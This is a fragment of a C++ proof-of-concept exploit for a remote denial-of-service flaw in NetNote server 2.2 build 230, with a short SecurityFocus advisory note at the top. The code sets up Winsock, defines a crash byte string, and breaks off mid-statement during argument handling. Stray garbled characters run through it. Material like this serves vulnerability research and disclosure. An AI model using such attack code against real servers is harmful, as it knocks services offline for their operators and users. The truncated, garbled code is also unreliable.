// source: https://www.securityfocus.com/bid/11677/info NetNote server is reported prone to a remote denial of service vulnerability. This issue occurs because the application does not handle exceptional conditions properly. NetNote server 2.2 build 230 is reported vulnerable to this issue, however, it is likely that other versions are affected as well. */ � #include "winsock2.h" #include "fstream.h" � #pragma comment(lib, "ws2_32") � static char payload[100]; � char crash[]="\x90\x90\x90\x90\x20\x20\x20\x20"; � void usage(char* us); WSADATA wsadata; void ver(); � int main(int argc,char *argv[]) { �ver(); �if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;} �if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<